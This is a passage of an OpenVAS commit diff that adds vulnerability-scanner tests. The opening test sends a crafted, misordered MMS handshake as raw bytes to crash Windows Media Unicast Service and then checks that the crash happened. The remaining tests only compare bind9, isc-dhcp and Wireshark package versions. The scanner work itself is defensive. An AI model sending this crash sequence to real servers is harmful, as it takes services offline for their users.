+ 0xa1, 0x45, 0xb6, 0x01, 0x40, 0x0a, 0x00, 0x00, 0x00,
+ 0x02, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0xff,
+ 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0xa0, 0x00, 0x02, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c,
+ 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2e, 0x00,
+ 0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x30,
+ 0x00, 0x2e, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x54, 0x00,
+ 0x43, 0x00, 0x50, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x31,
+ 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x00, 0x32, 0x00,
+ 0x63, 0x00, 0x30, 0x00);
+
+mss_req4 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x88,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x11, 0x00,
+ 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x2b, 0x87, 0x16,
+ 0xd9, 0xce, 0xf7, 0x01, 0x40, 0x0f, 0x00, 0x00, 0x00,
+ 0x05, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff,
+ 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x54, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20,
+ 0x00, 0x45, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
+ 0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x54, 0x00, 0x65,
+ 0x00, 0x71, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6c, 0x00,
+ 0x61, 0x00, 0x20, 0x00, 0x53, 0x00, 0x75, 0x00, 0x6e,
+ 0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00,
+ 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x6b, 0x00, 0x2f,
+ 0x00, 0x65, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
+ 0x65, 0x00, 0x73, 0x00, 0x32, 0x00, 0x38, 0x00, 0x2e,
+ 0x00, 0x61, 0x00, 0x73, 0x00, 0x66, 0x00, 0x00, 0x00,
+ 0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00);
+
+mss_req5 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x48,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x09, 0x00,
+ 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x67, 0x66, 0x66,
+ 0x66, 0x66, 0x66, 0x02, 0x40, 0x07, 0x00, 0x00, 0x00,
+ 0x15, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
+ 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x65, 0x00, 0x20,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xac, 0x40, 0x02,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);
+
+mss_req6 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x30,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x06, 0x00,
+ 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0a, 0xd7, 0xa3,
+ 0x70, 0x3d, 0x0a, 0x11, 0x40, 0x04, 0x00, 0x00, 0x00,
+ 0x33, 0x00, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff,
+ 0xff, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x02, 0x00,
+ 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x65, 0x00, 0x20,
+ 0x00);
+
+mss_req7 = raw_string(0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x38,
+ 0x00, 0x00, 0x00, 0x4d, 0x4d, 0x53, 0x20, 0x07, 0x00,
+ 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2f, 0xdd, 0x24,
+ 0x06, 0x81, 0x15, 0x11, 0x40, 0x05, 0x00, 0x00, 0x00,
+ 0x07, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff,
+ 0xff, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+ 0xff, 0x16, 0xca, 0x03, 0x80, 0x04, 0x00, 0x00, 0x00);
+
+## Send the Misordered Handshake Sequence
+send(socket:soc1 , data: mss_req2);
+send(socket:soc1 , data: mss_req3);
+send(socket:soc1 , data: mss_req4);
+send(socket:soc1 , data: mss_req5);
+send(socket:soc1 , data: mss_req6);
+send(socket:soc1 , data: mss_req7);
+res = recv(socket:soc1, length:1024);
+
+sleep(7);
+close(soc1);
+
+soc2 = open_sock_tcp(port);
+
+## Confirm Windows Media Unicast Service crashed
+## If couldn't open soc then mms is crashed
+if(!soc2)
+{
+ security_warning(port);
+ exit(0);
+}
+else
+{
+ ## Send the Connect request again
+ ## Confirm it doesnot responds
+ send(socket:soc2 , data: mss_req1);
+ mms_res = recv(socket:soc2, length:512);
+ close(soc2);
+
+ if(!mms_res || "MMS" >!< mms_res){
+ security_warning(port);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,133 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Ubuntu Update for bind9 USN-1518-1
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ Einar Lonn discovered that Bind incorrectly initialized the failing-query
+ cache. A remote attacker could use this flaw to cause Bind to crash,
+ resulting in a denial of service.
+
+ Affected Software/OS:
+ bind9 on Ubuntu 12.04 LTS ,
+ Ubuntu 11.10 ,
+ Ubuntu 11.04 ,
+ Ubuntu 10.04 LTS
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-July/001771.html ";
+
+if(description)
+{
+ script_id(841094);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:51 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3817");
+ script_tag(name:"cvss_base", value:"7.8");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "USN", value: "1518-1");
+ script_name("Ubuntu Update for bind9 USN-1518-1");
+
+ script_description(desc);
+ script_summary("Check for the Version of bind9");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Ubuntu Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "HostDetails/OS/cpe:/o:canonical:ubuntu_linux", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-deb.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "UBUNTU10.04 LTS")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns64", ver:"9.7.0.dfsg.P1-1ubuntu0.6", rls:"UBUNTU10.04 LTS")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU12.04 LTS")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns81", ver:"9.8.1.dfsg.P1-4ubuntu0.2", rls:"UBUNTU12.04 LTS")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.10")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns69", ver:"9.7.3.dfsg-1ubuntu4.3", rls:"UBUNTU11.10")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.04")
+{
+
+ if ((res = isdpkgvuln(pkg:"libdns69", ver:"9.7.3.dfsg-1ubuntu2.5", rls:"UBUNTU11.04")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,122 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Ubuntu Update for isc-dhcp USN-1519-1
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ Markus Hietava discovered that the DHCP server incorrectly handled certain
+ malformed client identifiers. A remote attacker could use this issue to
+ cause DHCP to crash, resulting in a denial of service. (CVE-2012-3571)
+
+ Glen Eustace discovered that the DHCP server incorrectly handled memory. A
+ remote attacker could use this issue to cause DHCP to crash, resulting in a
+ denial of service. (CVE-2012-3954)
+
+ Affected Software/OS:
+ isc-dhcp on Ubuntu 12.04 LTS ,
+ Ubuntu 11.10 ,
+ Ubuntu 11.04
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-July/001772.html ";
+
+if(description)
+{
+ script_id(841095);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:54 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3571", "CVE-2012-3954");
+ script_tag(name:"cvss_base", value:"6.1");
+ script_tag(name:"cvss_base_vector", value:"AV:A/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "USN", value: "1519-1");
+ script_name("Ubuntu Update for isc-dhcp USN-1519-1");
+
+ script_description(desc);
+ script_summary("Check for the Version of isc-dhcp");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Ubuntu Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "HostDetails/OS/cpe:/o:canonical:ubuntu_linux", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-deb.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "UBUNTU12.04 LTS")
+{
+
+ if ((res = isdpkgvuln(pkg:"isc-dhcp-server", ver:"4.1.ESV-R4-0ubuntu5.2", rls:"UBUNTU12.04 LTS")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.10")
+{
+
+ if ((res = isdpkgvuln(pkg:"isc-dhcp-server", ver:"4.1.1-P1-17ubuntu10.3", rls:"UBUNTU11.10")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "UBUNTU11.04")
+{
+
+ if ((res = isdpkgvuln(pkg:"isc-dhcp-server", ver:"4.1.1-P1-15ubuntu9.4", rls:"UBUNTU11.04")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Wireshark ASN.1 BER Dissector Denial of Service Vulnerability (Mac OS X)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802665);
+ script_version("$Revision$");
+ script_bugtraq_id(45775);
+ script_cve_id("CVE-2011-0445");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 17:17:17 +0530 (Mon, 30 Jul 2012)");
+ script_name("Wireshark ASN.1 BER Dissector Denial of Service Vulnerability (Mac OS X)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to denial of
+ service vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by an assertion error in the ASN.1 BER dissector, which
+ could be exploited to crash an affected application.
+
+ Impact:
+ Successful exploitation will allow attackers to create a denial of service.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark versions 1.4.0 through 1.4.2 on Mac OS X
+
+ Fix: Upgrade to the latest version of Wireshark 1.4.3 or later,
+ For updates refer, http://www.wireshark.org/download
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/64625
+ http://www.vupen.com/english/advisories/2011/0079
+ http://www.wireshark.org/security/wnpa-sec-2011-02.html
+ https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5537 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark on Mac OS X");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("Denial of Service");
+ script_dependencies("gb_wireshark_detect_macosx.nasl");
+ script_require_keys("Wireshark/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Variable Initialization
+sharkVer = "";
+
+## Get version from KB
+sharkVer = get_kb_item("Wireshark/MacOSX/Version");
+if(!sharkVer){
+ exit(0);
+}
+
+## Check for vulnerable Wireshark versions
+if(version_in_range (version:sharkVer, test_version:"1.4.0", test_version2:"1.4.2")) {
+ security_warning(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Wireshark MAC-LTE dissector Buffer Overflow Vulnerability (Mac OS X)
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802664);
+ script_version("$Revision$");
+ script_bugtraq_id(45775);
+ script_cve_id("CVE-2011-0444");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 17:17:17 +0530 (Mon, 30 Jul 2012)");
+ script_name("Wireshark MAC-LTE dissector Buffer Overflow Vulnerability (Mac OS X)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to buffer
+ overflow vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by a buffer overflow error in the MAC-LTE dissector,
+ which could be exploited to crash an affected application or compromise
+ a vulnerable system.
+
+ Impact:
+ Successful exploitation will allow attackers to create a denial of service
+ or execute arbitrary code.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Wireshark versions 1.2.0 through 1.2.13 and 1.4.0 through 1.4.2 on Mac OS X
+
+ Fix: Upgrade to the latest version of Wireshark 1.4.3 or later,
+ For updates refer, http://www.wireshark.org/download
+
+ References:
+ http://osvdb.org/70403
+ http://xforce.iss.net/xforce/xfdb/64624
+ http://www.vupen.com/english/advisories/2011/0079
+ http://www.wireshark.org/security/wnpa-sec-2011-02.html
+ https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5530 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark on Mac OS X");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ script_dependencies("gb_wireshark_detect_macosx.nasl");
+ script_require_keys("Wireshark/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Variable Initialization
+sharkVer = "";
+
+## Get version from KB
+sharkVer = get_kb_item("Wireshark/MacOSX/Version");
+if(!sharkVer){
+ exit(0);
+}
+
+## Check for vulnerable Wireshark versions
+if(version_in_range (version:sharkVer, test_version:"1.2.0", test_version2:"1.2.13") ||
+ version_in_range (version:sharkVer, test_version:"1.4.0", test_version2:"1.4.2")) {
+ security_hole(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
More information about the Openvas-commits
mailing list